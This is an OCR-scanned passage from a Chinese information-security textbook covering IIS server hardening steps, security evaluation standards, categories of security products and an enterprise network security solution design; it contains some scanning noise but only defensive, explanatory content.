(1) 在 “功能 视图 ”中 ,双击 “授权 规则 ”"。 在 “操作 ” 窗 格 中 , 单 击 “ 添 加 允许 规则 ”按钮 。 

(2) 在 “添加 允许 授权 规则 ”对 话 框 中 ,可 以 选择 “所 有 用 户 ”“ 所 有 匿名 用 户 ”“ 指 定 的 角 
色 或 用 户 组 “指定 的 用 户 ” 其 中 之 一 。 

此 外 ,如 果 要 进一步 规定 允许 访问 相应 内 容 的 用 户 、 角 色 或 组 只 能 使 用 特定 HTTP 谓 
词 列 表 , 则 还 可 以 选中 * 将 此 规则 应 用 于 特定 谓词 ” 复 选 框 。 要 在 对 应 的 文本 框 中 输入 这 些 
谓词 。 

9. 配置 ISAPI 和 CGI 限制 

默认 情况 下 ,存在 多 种 文件 扩展 名 均 可 在 Web 服务 器 上 运行 ,为 了 降低 此 风险 ,应 只 允 
许 用 户 具有 的 那些 特定 ISAPI 扩展 或 CGI 文件 在 Web 服务 器 上 运行 。 

操作 方法 如 下 。 

(1) 在 “功能 视图 ”中 ,双击 “添加 ISAPI 和 CGI 限制 ”。 在 “操作 ” 窗 格 中 , 单 击 “ 添 加 ” 
按钮 。 

(2) 在 “添加 ISAPI 或 CGI 限制 ?对 话 框 中 的 *ISAPI 或 CGI 路径” 文本 框 中 输入 该 . dl 
或 . exe 文件 的 路 径 ,或 者 单 击 “ 浏 览 "按钮 导航 至 该 文件 的 位 置 。 

在 “描述 "文本 框 中 ,输入 有 关 限 制 的 简要 描述 。 

(3) 选中 “允许 执行 扩展 路 径 ” 复 选 框 ,以 允许 限制 自动 运行 。 如 果 未 选中 此 复 选 框 , 限 
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制 的 状态 将 默认 为 “不 允许 ”。 以 后 ,用 户 可 以 通过 选择 限制 并 在 “操作 ” 窗 格 中 单 击 “ 人 允许 ” 
按钮 来 允许 该 限制 。 

通过 上 述 配置 ,使 用 独立 的 匿名 访问 用 户 和 应 用 程序 池 用 户 ,杜绝 了 各 网 站 之 间 相 互 影 
响 的 隐患 。 并 为 网 站 目录 设置 权限 ,防止 上 传 的 木马 文件 被 执行 。 在 多 次 实践 和 测试 中 ,证 
明 上 述 操作 是 易于 实现 而 又 行 之 有 效 的 ,可 以 提高 IIS 服务 器 在 运行 中 的 安全 性 ,从 而 保障 
网 站 的 正常 运行 。 


本 章 小 结 


本 章 主要 介绍 了 目前 服务 器 常用 的 操作 系统 种 类 (UNIX、Linux、Windows) 及 各 类 操 
作 系 统 的 特点 。 重 点 介绍 了 Windows Server 系统 的 安全 配置 ,从 策略 管理 ,文件 的 安全 , 注 
册 表 设置 .日 志 审 核 . 系 统 服务 的 其 他 安全 设置 等 几 方面 ,说 明 Windows 系统 的 安全 配置 过 
程 。 另 外 ,本 章 实 训 中 介绍 了 实现 Web 服务 器 的 安全 配置 方法 。 


1. Windows 系统 的 安全 机 制 都 有 哪些 ? 

2. 以 Windows Server 2008 为 例 , 分 析 该 操作 系统 具有 哪些 访问 控制 功能 。 

3. 以 你 本 人 所 使 用 的 操作 系统 为 例 ,你 目前 已 采取 了 哪些 安全 措施 ? 分 析 还 存在 哪些 
安全 隐患 ,考虑 下 一 步 该 采取 哪些 安全 措施 来 增强 系统 的 安全 性 。 

4. 在 学 习 生 活 中 你 和 你 的 同学 遇 到 过 QQ 账号 .网络 游戏 账号 或 网 上 交易 账号 被 盗 的 
情况 吗 ? 分 析 原 因 并 思考 以 后 该 采取 哪些 措施 进行 有 效 防范 。 

5. 以 你 本 人 所 使 用 的 操作 系统 为 例 ,检测 该 系统 存在 哪些 安全 漏洞 。 平 时 是 如 何 来 修 
复 操作 系统 漏洞 和 应 用 软件 漏洞 的 ? 


第 13 章 信息 安全 解决 方案 


当前 ,信息 科技 的 发 展 使 得 计算 机 的 应 用 范围 已 经 遍及 世界 各 个 角落 。 众 多 的 企 事业 
单位 都 纷纷 依靠 信息 技术 构建 自身 的 信息 系统 和 业务 运营 平台 。 利 用 通信 网 络 把 孤立 的 单 
机 系统 连接 起 来 ,相互 通信 和 共享 资源 。 但 由 于 计算 机 信息 的 共享 及 互联 网 特有 的 开放 性 ， 
使 得 信息 安全 问题 日 益 严 重 。 在 对 信息 化 系统 严重 依赖 的 情况 下 ,如 何 有 效 地 增强 安全 防 
范 能 力 及 有 效 地 控制 安全 风险 是 当前 迫切 需要 解决 的 问题 。 


13.1 信息 安全 体系 结构 现状 


20 世纪 80 年 代 中 期 ,美国 国防 部 为 适应 军事 计算 机 的 保密 需要 ,在 20 世纪 70 年 代 的 
基础 理论 研究 成 果 计 算 机 保密 模型 (Bell&.Lapadula 模型 ) 的 基础 上 ,制定 了 “可 信 计 算 机 系 
统 安 全 评价 准则 ”(TCSEC) ,其 后 又 对 网 络 系统 、 数 据 库 等 方面 做 出 了 一 系列 安全 解释 , 形 
成 了 安全 信息 系统 体系 结构 的 最 早 原则 。 至 今 ,美国 已 研制 出 符合 TCSEC 要 求 的 安全 系 
统 ( 包 括 安全 操作 系统 .安全 数据 库 .安全 网 络 部 件 ) 达 100 多 种 ,但 这 些 系统 仍 有 局 限 性 ,还 
没有 真正 达到 形式 化 描述 和 证 明 的 最 高 级 安全 系统 。 

1989 年 ,确立 了 基于 OSI 参考 模型 的 信息 安全 体系 结构 ,1995 年 在 此 基础 上 进行 修 
正 , 颁 布 了 信息 安全 体系 结构 的 标准 ,具体 包括 五 大 类 安全 服务 、 八 大 种 安全 机 制 和 相应 的 
安全 管理 标准 。20 世纪 90 年 代 初 , 英 、 法 、 德 , 荷 四 国 针对 TCSEC 准则 只 考虑 保密 性 的 局 
限 ,联合 提出 了 包括 保密 性 、 完 整 性 、 可 用 性 概念 的 “信息 技术 安全 评价 准则 ”(ITSEC) ,但 是 
该 准则 中 并 没有 给 出 综合 解决 以 上 问题 的 理论 模型 和 方案 。 近 年 来 六 国 七 方 (美国 国家 安 
全 局 和 国家 技术 标准 研究 所 、 加 、 英 ,法 、 德 , 荷 ) 共 同 提出 了 “信息 技术 安全 评价 通用 准则 ” 
(CC for ITSEC) 。CC 综合 了 国际 上 已 有 的 评测 准则 和 技术 标准 的 精华 ,给 出 了 框架 和 原 
则 要 求 , 但 它 仍然 缺少 综合 解决 信息 的 多 种 安全 属性 的 理论 模型 依据 。 

标准 于 1999 年 7 月 通过 国际 标准 化 组 织 的 认可 ,被 确立 为 国际 标准 ,编号 为 ISO/IEC 
15408。ISO/IEC 15408 标准 对 安全 的 内 容 和 级 别 给 予 了 更 完整 的 规范 ,为 用 户 对 安全 需求 
的 选取 提供 了 充分 的 灵活 性 。 然 而 ,国外 研制 的 高 安全 级 别 的 产品 对 我 国 是 封锁 禁 售 的 , 即 
使 出 售 给 我 国 ,其 安全 性 也 难以 令 人 放心 。 

安全 体系 结构 理论 与 技术 主要 包括 安全 体系 模型 的 建立 及 其 形式 化 描述 与 分 析 , 安 全 
策略 和 机 制 的 研究 ,检验 和 评估 系统 安全 性 的 科学 方法 和 准则 的 建立 ,符合 这 些 模 型 .策略 
和 准则 的 系统 的 研制 (如 安全 操作 系统 、 安 全 数据 库 系统 等 )。 

我 国 在 系统 安全 的 研究 及 应 用 方面 与 先进 国家 和 地 区 存在 着 很 大 的 差距 。 近 几 年 来 ， 
我 国 进行 了 安全 操作 系统 、 安 全 数据 库 、 多 级 安全 机 制 的 研究 ,但 由 于 自主 安全 内 核 受 控 于 
人 ,难以 保证 没有 漏洞 ,而 且 大 部 分 有 关 的 工作 都 以 美国 1985 年 的 TCSEC 标准 为 主要 参 
照 系 开发 的 防火 墙 安 全 路 由 器 ,安全 网 关 、 黑 客人 侵 检测 系统 等 产品 和 技术 ,主要 集中 在 系 
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统 应 用 环境 的 较 高 层次 上 ,在 完善 性 .规范 性 .实用 性 上 还 存在 许多 不 足 ,特别 是 在 多 平台 的 
兼容 性 、 多 协议 的 适应 性 、 多 接口 的 满足 性 方面 存在 很 大 的 差距 ,其 理论 基础 和 自主 的 技术 
手段 也 有 待 于 发 展 和 强化 。 然 而 ,我 国 的 系统 安全 的 研究 与 应 用 毕竟 已 经 起 步 ,具备 了 一 定 
的 基础 和 条 件 。1999 年 10 月 ,我 国 发 布 了 “计算 机 信息 系统 安全 保护 等 级 划分 准则 ”, 该 准 
则 为 安全 产品 的 研制 提供 了 技术 支持 ,也 为 安全 系统 的 建设 和 管理 提供 了 技术 指导 。 

Linux 开放 源 代码 为 我 国 自主 研制 安全 操作 系统 提供 了 前 所 未 有 的 机 遇 。 作 为 信息 系 
统 赖 以 支持 的 基础 系统 软件 一 一 操作 系统 ,其 安全 性 是 关键 。 长 期 以 来 ,我 国 广泛 使 用 的 主 
流 操 作 系 统 都 是 从 国外 引进 的 。 从 国外 引进 的 操作 系统 ,其 安全 性 难以 令 人 放心 。 具 有 我 
国 自主 版 权 的 安全 操作 系统 产品 在 我 国 各 行 各 业 都 迫切 需要 。 我 国政 府 、 国 防 、 金 融 等 机 构 
对 操作 系统 的 安全 都 有 各 自 的 要 求 ,都 迫切 需要 找到 一 个 既 满 足 功能 .性 能 要 求 , 又 具备 足 
够 的 安全 可 信 度 的 操作 系统 。Linux 的 发 展 及 其 在 国际 上 的 广泛 应 用 ,在 我 国 也 产生 了 广 
泛 的 影响 ,只 要 其 安全 问题 得 到 妥善 解决 ,就 会 得 到 我 国 各 行 各 业 的 普遍 接受 。 


13.2 ”网络 安全 产品 


解决 网 络 信息 安全 问题 的 主要 途径 是 利用 密码 技术 和 网 络 访问 控制 技术 。 密 码 技术 用 
于 隐蔽 传输 信息 ,认证 用 户 身份 等 。 网 络 访问 控制 技术 用 于 对 系统 进行 安全 保护 ,抵抗 各 种 
外 来 攻击 。 目 前 ,在 市 场 上 比较 流行 ,而 又 能 够 代表 未 来 发 展 方向 的 安全 产品 大 致 有 以 下 
几 类 。 

1. 防火 墙 

防火 墙 在 某 种 意义 上 可 以 说 是 一 种 访问 控制 产品 。 它 在 内 部 网 络 与 不 安全 的 外 部 网 络 
之 间 设 置 障碍 ,阻止 外 界 对 内 部 资源 的 非法 访问 ,防止 内 部 对 外 部 的 不 安全 访问 。 防 火 墙 的 
主要 技术 有 包 过 滤 技 术 .应 用 网 关 技 术 和 代理 服务 技术 。 防 火 墙 能 够 较为 有 效 地 防止 黑客 
利用 不 安全 的 服务 对 内 部 网 络 进行 的 攻击 ,并 且 能 够 实现 数据 流 的 监控 ,过滤 、 记 录 和 报告 
功能 , 较 好 地 隔断 内 部 网 络 与 外 部 网 络 的 连接 。 但 它 本 身 可 能 存在 安全 问题 ,也 可 能 会 是 一 
个 潜在 的 瓶颈 。 

2. 安全 路 由 器 

由 于 WAN 连接 需要 专用 的 路 由 器 设备 ,因而 可 通过 路 由 器 来 控制 网 络 传输 。 通 常 采 
用 访问 控制 列表 技术 来 控制 网 络 信息 流 。 

3. 虚拟 专用 网 (VPN) 

虚拟 专用 网 (VPN) 是 在 公共 数据 网 络 上 通过 采用 数据 加 密 技术 和 访问 控制 技术 来 实 
现 两 个 或 多 个 可 信 内 部 网 之 间 的 互 连 。VPN 的 构架 通常 都 要 求 采用 具有 加 密 功能 的 路 由 
器 或 防火 墙 ,以 实现 数据 在 公共 信道 上 的 可 信 传 递 。 

4. 安全 服务 器 

安全 服务 器 主要 针对 一 个 局 域 网 内 部 信息 存储 ,传输 的 安全 保密 问题 ,其 实现 功能 包括 
对 局 域 网 资源 的 管理 和 控制 ,对 局 域 网 内 用 户 的 管理 ,以 及 对 局 域 网 中 所 有 安全 相关 事件 的 
审计 和 跟踪 。 
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5. 电子 签证 机 构 一 一 CA 和 PKI 产品 

电子 签证 机 构 (CA) 作 为 通信 的 第 三 方 ,为 各 种 服务 提供 可 信任 的 认证 服务 。CA 可 向 
用 户 发 行 电 子 证 书 , 为 用 户 提供 成 员 身 份 验 证 和 密 钥 管理 等 功能 。PKI 产品 可 以 提供 更 多 
的 功能 和 更 好 的 服务 ,可 作为 所 有 应 用 的 计算 基础 结构 的 核心 部 件 。 

6. 用 户 认证 产品 

由 于 IC 卡 技术 的 日 益 成 熟 和 完善 ,IC 卡 被 更 为 广泛 地 用 于 用 户 认证 产品 中 ,用 来 存储 
用 户 的 个 人 私 钥 , 并 与 其 他 技术 (如 动态 口令 ) 相 结合 ,对 用 户 身 份 进行 有 效 的 识别 。 同 时 ， 
还 可 将 IC 卡 上 的 个 人 私 钥 与 数字 签名 技术 相 结合 ,实现 数字 签名 机 制 。 随 着 模式 识别 技术 
的 发 展 ,如 指纹 ,视网膜 \ 脸 部 特征 等 高 级 的 身份 识别 技术 也 会 投入 应 用 ,并 与 数字 签名 等 现 
有 技术 结合 ,使 得 对 于 用 户 身 份 的 认证 和 识别 功能 更 趋 完善 。 

7. 安全 管理 中 心 

由 于 网 上 的 安全 产品 较 多 , 且 分 布 在 不 同 的 位 置 , 这 就 需要 建立 一 套 集 中 管理 的 机 制 和 
设备 , 即 安全 管理 中 心 。 它 用 来 给 各 网 络 安全 设备 分 发 密 钥 ,监控 网 络 安全 设备 的 运行 状 
态 , 负 责 收 集 网 络 安全 设备 的 审计 信息 等 。 

8. 入 侵 检 测 系 统 (IDS) 

入 侵 检测 系统 作为 传统 保护 机 制 (如 访问 控制 身份 识别 等 ) 的 有 效 补充 ,形成 了 信息 系 
统 中 不 可 或 缺 的 反馈 链 。 

9. 安全 数据 库 

由 于 大 量 的 信息 存储 在 计算 机 数据 库 中 ,有 些 信息 既是 有 价值 的 ,也 是 敏感 的 ,需要 保 
护 , 安 全 数据 库 可 以 确保 数据 库 的 完整 性 可 靠 性 有效 性 、 机 密 性 、 可 审计 性 及 存 取 控制 与 
用 户 身份 识别 等 。 

10. 安全 操作 系统 

给 系统 中 的 关键 服务 器 提供 安全 运行 平台 ,构成 安全 WWW 服务 、 安 全 FTP 服务 、 安 
全 SMTP 服务 等 ,并 作为 各 类 网 络 安全 产品 的 坚实 底座 ,确保 这 些 安全 产品 的 自身 安全 。 

在 上 述 所 有 主要 的 发 展 方向 和 产品 种 类 中 ,都 包含 了 密码 技术 的 应 用 ,并 且 是 非常 基础 
性 的 应 用 。 很 多 的 安全 功能 和 机 制 的 实现 都 建立 在 密码 技术 的 基础 之 上 ,甚至 可 以 说 没有 
密码 技术 就 没有 安全 可 言 。 

但 是 ,人 们 也 应 该 看 到 密码 技术 与 通信 技术 .计算 机 技术 及 芯片 技术 的 融合 正 日 益 紧 
密 , 其 产品 的 分 界线 越 来 越 模糊 ,彼此 也 越 来 越 不 能 分 割 。 在 一 个 计算 机 系统 中 ,很 难 简 单 
地 划分 某 个 设备 是 密码 设备 , 某 个 设备 是 通信 设备 。 而 这 种 融合 的 最 终 目 的 还 是 在 于 为 用 
户 提供 高 可 信任 的 ,安全 的 计算 机 和 网 络 信息 系统 。 


13.3 信息 安全 市 场 发 展 趋势 


1. 加 强 内 部 行为 监控 与 防范 是 未 来 信息 安全 市 场 发 展 的 重点 
内 部 原因 造成 的 泄密 事件 不 断 发 生 ,表明 了 越 来 越 多 的 网 络 风险 和 威胁 来 自 内 部 。 加 
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强 内 部 行为 监控 与 防范 是 信息 安全 发 展 的 重点 。 随 着 各 国保 密 政策 和 规范 的 不 断 出 台 , 信 
息 安 全 保密 检查 、 信 息 安 全 保密 防护 、 网 络 行为 管理 安全 审计 及 安全 风险 评估 与 分 析 等 产 
品 的 需求 持续 增加 。 

2. 从 单一 产品 向 信息 安全 整体 解决 方案 发 展 

信息 安全 是 一 个 综合 性 的 问题 , 仅 靠 几 款 单独 的 产品 很 难 实现 完整 的 信息 安全 保护 ,用 
户 需要 的 是 能 够 面向 行业 的 解决 个 性 化 需求 的 信息 安全 整体 解决 方案 。 传 统 的 单一 防护 产 
晶 , 如 防火 墙 、 防 杀毒 产品 都 是 以 某 一 局 域 网 的 节点 控制 为 主 的 ,未 来 信息 安全 产品 将 构建 
完整 的 安全 防护 体系 ,实现 信息 系统 的 纵深 安全 保护 。 

3. 随 着 新 信息 技术 发 展 , 信 息 安 全 未 来 发 展 潜力 巨大 

随 着 云 计 算 、 物 联网 ,移动 互联 、 大 数据 等 新 兴 技 术 的 发 展 ,信息 安全 越 来 越 显 示 出 其 重 
要 性 。 基 础 网 络 \ 硬 件 、 软 件 及 应 用 提供 商都 必须 考虑 信息 安全 ,而 且 为 了 保障 产品 和 服务 ， 
一 些 著名 的 IT 公司 纷纷 开始 进入 信息 安全 领域 ,如 Intel 收购 McAfee、HP 收购 ArcSight 
等 事件 ,这 一 系列 事件 表明 信息 安全 具有 巨大 的 吸引 力 。 

4. 云 安全 和 移动 设备 安全 逐步 成 为 信息 安全 市 场 关注 的 重点 

云 计算 的 普及 使 云 安 全 成 为 用 户 普遍 关注 的 问题 , 随 着 移动 设备 数量 持续 增长 ,导致 敏 
感 信息 的 泄露 风险 加 大 ,移动 设备 的 安全 防护 问题 成 为 信息 安全 领域 的 新 热点 。 

我 国信 息 安 全 产业 针对 各 类 网 络 威胁 行为 已 经 具备 了 一 定 的 防护 ,监管 .控制 能 力 ,市 
场 开发 潜力 得 到 不 断 提 升 。 最 近 几 年 ,信息 安全 产业 在 政府 引导 、 企 业 参 与 和 用 户 认可 的 良 
性 循环 中 稳步 成 长 ,本土 企业 实力 逐步 加 强 。 安 全 产品 结构 日 益 丰 富 , 网 络 边 界 安全 ,内 网 
信息 安全 及 外 网 信息 交换 安全 等 领域 全 面 发 展 。 安 全 标准 、 安 全 芯片 .安全 硬件 ,安全 软件 、 
安全 服务 等 产业 链 关键 环节 竞争 力 不 断 增强 。 


13.4 某 大 型 企业 网 络 安全 解决 方案 实例 


安全 解决 方案 的 目标 是 在 不 影响 企业 局 域 网 当前 业务 的 前 提 下 ,实现 对 其 局 域 网 全 面 
的 安全 管理 。 将 安全 策略 ,硬件 及 软件 等 方法 结合 起 来 ,构成 一 个 统一 的 防御 系统 ,可 有 效 
阻止 非法 用 户 进入 网 络 , 减 少 网 络 的 安全 风险 。 创 建 一 种 安全 方案 意味 着 设计 一 种 如 何 处 
理 计算 机 安全 问题 的 计划 ,也 就 是 尽力 在 黑客 征服 系统 以 前 保护 系统 。 通 常 ,设计 一 套 安 全 
方案 涉及 以 下 步 又 。 

(1) 网 络 安全 需求 分 析 。 确 切 了 解 网 络 信 息 系统 需要 解决 哪些 安全 问题 是 建立 合理 安 
全 需求 的 基础 。 

(2) 确立 合理 的 安全 策略 。 

(3) 制订 可 行 的 技术 方案 ,包括 工程 实施 方案 (产品 的 选 购 与 订 制 )、 制 订 管理 办 法 等 。 


13.4.1 网 络 安全 需求 分 析 


网 络 安全 总 体 安全 需求 是 建立 在 对 网 络 安全 层次 分 析 基 础 上 确定 的 。 依 据 网 络 安全 分 
层 理论 ,根据 ISO 七 层 网 络 协议 ,在 不 同 层 次 上 ,相应 的 安全 需求 和 安全 目标 的 实现 手段 各 
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不 相同 ,主要 是 针对 在 不 同 层次 上 安全 技术 实现 而 定 的 。 尖 久久 责任 有 限 公 司 的 当前 网 络 
状况 如 图 13-1 所 示 。 


胡可 原则 马 


图 13-1 XXX 责 任 有 限 公司 的 当前 网 络 状况 


对 于 以 TCP / IP 为 主 的 X XX 责任 有 限 公 司 网 来 说 ,安全 层次 是 与 TCP/IP 网 络 层次 
相对 应 的 ,针对 X XxX x 责任 有 限 公 司 网 的 实际 情况 ,下 面 将 安全 需求 层次 归纳 为 网 络 层 和 应 
用 层 两 个 技术 层次 ,具体 描述 如 下 。 

1. 网 络 层 需求 分 析 

网 络 层 安全 需求 是 保护 网 络 不 受 攻击 ,确保 网 络 服务 的 可 用 性 。 

首先 ,作为 X x Xx 责任 有 限 公司 网 络 同 Internet 的 互联 的 边界 安全 应 作为 网 络 层 的 主 
要 安全 需求 。 

(1) 需要 保证 Xx X XxX 责任 有 限 公 司 网 络 与 Internet 安全 互联 ,能 够 实现 网 络 的 安全 
隔离 。 

(2) 必要 的 信息 交互 的 可 信任 性 。 

(3) 要 保证 X X XxX 责任 有 限 公 司 网 络 不 能 够 被 Internet 访问 。 

(4) 同时 XX XxX 责任 有 限 公 司 网 络 公共 资源 能 够 对 开放 用 户 提 供 安 全 访问 能 力 。 

(5) 能 够 防范 通过 Internet 的 形式 所 造成 的 信息 泄露 和 有 害 信息 对 于 X X X 责 任 有 限 
公司 网 络 的 侵害 。 

@O 利用 HTTP 应 用 ,通过 Java Applet、ActiveX 及 Java Script 形式 。 

@ 利用 FTP 应 用 ,通过 文件 传输 形式 。 

@ 利用 SMTP 应 用 ,通过 对 邮件 分 析 及 利用 附件 。 

(6) 对 网 络 安全 事件 的 审计 。 


338 信息 安全 与 技术 (第 2 版 ) 


(7) 对 于 网 络 安全 状态 的 量化 评估 。 

(8) 对 网 络 安全 状态 的 实时 监控 。 

(9) 防范 来 自 Internet 的 网 络 人 侵 和 攻击 行为 的 发 生 ,并 能 够 做 到 以 下 几 方 面 。 

@ 对 网 络 人 侵 和 攻击 的 实时 鉴别 。 

@ 对 网 络 人 侵 和 攻击 的 预警 。 

@ 对 网 络 人 侵 和 攻击 的 阻 断 与 记录 。 

其 次 ,对 于 X XX 责任 有 限 公司 网 络 内 部 同样 存在 网 络 层 的 安全 需求 ,包括 X x X 责 任 
有 限 公司 网 络 与 下 级 分 支 机 构 网 络 之 间 建 立 连接 控制 手段 ,对 集团 网 络 提供 高 于 网 络 边界 
更 高 的 安全 保护 。 

2. 应 用 层 需求 分 析 

建设 XX XxX 责任 有 限 公 司 网 的 目的 是 实现 信息 共享 、 资 源 共 享 的 。 因 此 ,必须 解决 
XxX XX 责任 有 限 公司 网 在 应 用 层 的 安全 。 应 用 层 安 全 主要 与 企业 的 管理 机 制 和 业务 系统 的 
应 用 模式 相关 。 管 理 机 制 决 定 了 应 用 模式 ,应 用 模式 决定 了 安全 需求 。 因 此 ,这 里 主要 针对 
各 局 域 网 内 应 用 的 安全 进行 讨论 ,并 就 建设 全 网 范围 内 的 应 用 系统 提出 一 些 建议 。 

应 用 层 的 安全 需求 是 针对 用 户 和 网 络 应 用 资源 的 ,主要 包括 以 下 内 容 。 

(1) 合法 用 户 可 以 以 指定 的 方式 访问 指定 的 信息 。 

(2) 合法 用 户 不 能 以 任何 方式 访问 不 允许 其 访问 的 信息 。 

(3) 非法 用 户 不 能 访问 任何 信息 。 

(4) 用 户 对 任何 信息 的 访问 都 有 记录 。 

要 解决 的 安全 问题 主要 包括 以 下 几 方面 。 

(1) 非法 用 户 利用 应 用 系统 的 后 门 或 漏洞 ,强行 进入 系统 。 

(2) 用 户 身 份 假冒 : 非法 用 户 利用 合法 用 户 的 用 户 名 ,破译 用 户 密码 ,然后 假冒 合法 用 
户 身份 ,访问 系统 资源 。 

(3) 非 授 权 访 问 : 非法 用 户 或 合法 用 户 访问 在 其 权限 之 外 的 系统 资源 。 

(4) 数据 窃取 : 攻击 者 利用 网 络 窃听 工具 窃取 经 由 网 络 传输 的 数据 包 。 

(5) 数据 算 改 : 攻击 者 算 改 网 络 上 传输 的 数据 包 。 

(6) 数据 重 放 攻 击 : 攻击 者 抓获 网 络 上 传输 的 数据 包 , 再 发 送 到 目的 地 。 

(7) 抵赖 : 信息 发 送 方 或 接收 方 抵赖 曾经 发 送 过 或 接收 到 了 信息 。 

一 般 来 说 ,各 应 用 系统 ,如 Notes、 数 据 库 .Web Server 自身 也 都 有 一 些 安全 机 制 , 传 统 
的 应 用 系统 安全 性 也 主要 依靠 系统 自身 的 安全 机 制 来 保证 。 其 主要 优点 是 与 系统 结合 紧 
密 , 但 也 存在 以 下 一 些 很 明显 的 缺点 。 

(1) 开发 量 大 : 据 统 计 , 传 统 的 应 用 系统 开发 中 ,安全 体系 的 设计 和 开发 约 占 开发 量 的 
1/3。 当 应 用 系统 需要 在 广域网 运行 时 , 随 着 安全 需求 的 增加 ,其 开发 量 占 的 比重 会 更 大 。 

(2) 安全 强度 参差 不 齐 : 有 些 应 用 系统 的 安全 机 制 很 弱 , 如 数据 库 系统 ,只 提供 根据 用 
户 名 /口令 的 认证 ,而 且 用 户 名 /口令 是 在 网 络 上 明文 传输 的 ,很 容易 被 窃听 到 。 有 些 应 用 系 
统 有 很 强 的 安全 机 制 ,如 Notes, 但 由 于 设计 、 开 发 人 员 对 其 安全 体系 的 理解 程度 以 及 投入 
的 工作 量 , 也 可 能 使 不 同 的 应 用 系统 的 安全 强度 会 相去 甚 远 。 

(3) 安全 没有 保障 : 目前 很 多 应 用 系统 设计 、 开 发 人 员 的 第 一 概念 是 系统 能 够 运行 ,而 
不 是 系统 能 够 安全 运行 ,因此 在 系统 设计 、 开 发 时 对 安全 考虑 很 少 ,甚至 为 了 简单 或 赶 进度 
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而 有 意 削 弱 安全 机 制 。 

(4) 维护 复杂 : 每 个 应 用 系统 的 安全 机 制 各 不 相同 ,导致 很 多 重复 性 工作 (如 建立 用 户 
账号 等 ); 系统 管理 员 必 须 熟悉 每 个 应 用 系统 独特 的 安全 机 制 ,工作 量 成 倍增 加 。 

(5) 用 户 使 用 不 方便 : 用 户 使 用 不 同 的 应 用 系统 时 ,都 必须 做 相应 的 身份 认证 , 且 有 些 
系统 需要 在 访问 不 同 资源 时 分 别 授权 (如 IIS Web Server 是 在 用 户 访 问 不 同 的 页 面 时 输入 
不 同 的 口令 ,口令 正确 才 人 允许 访问 )。 当 用 户 需 要 访问 多 个 应 用 系统 时 ,会 有 很 多 用 户 名 ` 口 
令 需 要 记忆 ,有 可 能 就 取 几 个 相同 的 简单 口令 ,从 而 降低 了 系统 的 安全 性 。 

综 上 所 述 ,建议 在 建设 X XX 责任 有 限 公司 网 应 用 系统 时 ,采用 具有 以 下 功能 的 商品 化 
的 应 用 层 安全 产品 作为 安全 应 用 平台 。 

(1) 安全 应 用 平台 必须 能 够 为 各 种 应 用 系统 提供 统一 的 入口 控制 ,而 且 只 有 通过 了 安 
全 应 用 平台 的 身份 认证 和 访问 授权 以 后 , 才 可 能 访问 某 个 具体 的 应 用 系统 。 

(2) 安全 应 用 平台 自身 的 安全 机 制 必须 是 系统 的 、 健 壮 的 ,以 免 因 为 各 种 应 用 系统 安全 
机 制 参差 不 齐 而 导致 系统 不 安全 的 现象 出 现 。 

(3) 安全 应 用 平台 必须 可 以 无 缝 集成 第 三 方 应 用 系统 ,如 Notes、 数 据 库 Web Server 
等 的 安全 机 制 。 

(4) 安全 应 用 平台 可 以 集中 对 各 种 第 三 方 应 用 系统 进行 安全 管理 ,包括 用 户 注册 、 用 户 
身份 认证 、 资 源 目录 管理 ,访问 授权 及 审计 记录 ,以 减少 重复 劳动 ,减轻 系统 管理 人 员 的 工作 
负担 。 

(5) 安全 应 用 平台 具有 可 伸缩 性 ,并 且 安 全 可 靠 。 


13.4.2 安全 管理 策略 


如 前 所 述 ,能 否 制定 一 个 统一 的 安全 策略 ,在 全 网 范围 内 实现 统一 的 安全 管理 ,对 于 
X xX XxX 责任 有 限 公司 网 来 说 就 至 关 重 要 了 。 

安全 管理 主要 包括 以 下 3 个 方面 。 

1. 内 部 安全 管理 

内 容 安 全 管理 主要 是 建立 内 部 安全 管理 制度 ,如 机 房管 理 制度 .设备 管理 制度 安全 系 
统管 理 制度 ,病毒 防范 制度 .操作 安全 管理 制度 .安全 事件 应 急 制度 等 ,并 采取 切实 有 效 的 措 
施 保证 制度 的 执行 。 内 部 安全 管理 主要 采取 行政 手段 和 技术 手段 相 结合 的 方法 。 

2. 网 络 安全 管理 

在 网 络 层 设置 路 由 器 .防火墙 ,安全 检测 系统 后 ,必须 保证 路 由 器 和 防火 墙 的 ACL 设 
置 正 确 ,其 配置 不 允许 被 随便 修改 。 网 络 层 的 安全 管理 可 以 通过 网 管 、 防 火 墙 、 安 全 检测 等 
一 些 网 络 层 的 管理 工具 来 实现 。 

3. 应 用 安全 管理 

应 用 系统 的 安全 管理 是 一 件 很 复杂 的 事情 。 由 于 各 个 应 用 系统 的 安全 机 制 不 一 样 , 因 
此 需要 通过 建立 统一 的 应 用 安全 平台 来 管理 ,包括 建立 统一 的 用 户 库 、 统 一 维护 资源 目录 、 
统一 授权 等 。 
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13.4.3 安全 解决 方案 分 析 


1. 网 络 配置 结构 图 
根据 安全 需求 ,总体 结构 示意 图 如 图 13-2 所 示 。 


i 
oS OO OO 


防 病毒 入 侵 检 测 安全 审计 身份 认证 


Firewall 


Switch 
(0000009099 5 


网 管 计算 机 
图 13-2 总 体 结构 示意 图 


2. 公司 总 部 安全 配置 

(1) 在 总 部 网 关 位 置 配置 CheckPoint Firewall-1 防火 墙 , 划 分 多 安全 区 域 , 将 内 网 对 外 
发 布 的 Web Server 和 电子 商务 网 站 放置 在 不 同 的 网 络 安全 区 域 。 

(2) 在 服务 器 区 前 放置 CheckPoint Firewall-1 防火 墙 模块 ,其 他 区 域 对 服务 器 区 的 访 
问 必须 经 过 防火 墙 模块 的 检查 。 

(3) 在 中 心 交换 机 上 配置 基于 网 络 的 IDS 系统 ,监控 整个 网 络 内 的 网 络 流量 。 

(4) 在 服务 器 区 内 的 重要 服务 器 ,如 Sybase 数据 库 服 务 器 等 ,安装 基于 主机 的 入 侵 检 
测 系统 ,对 所 有 数据 库 服 务 器 的 访问 进行 监控 ,并 对 数据 库 服务 器 的 操作 进行 记录 和 审计 。 

(5) 将 电子 商务 网 站 和 公司 普通 Web 发 布 服务 器 进行 独立 配置 ,对 电子 商务 网 站 的 访 
问 将 需要 身份 认证 和 加 密 传输 ,保证 电子 商务 的 安全 性 。 

(6) 在 DMZ 区 的 电子 商务 网 站 配置 基于 主机 的 入 侵 检测 系统 ,防止 来 自 Internet 对 
Http 服务 的 攻击 行为 。 

(7) 在 公司 总 部 安装 SPA 统一 认证 服务 器 ,对 所 有 需要 的 认证 进行 统一 管理 ,并 根据 
客户 的 安全 级 别 设置 所 需要 的 认证 方式 (如 静态 口令 ,动态 口令 数字 证 书 等 )。 

3. 产品 配置 说 明 

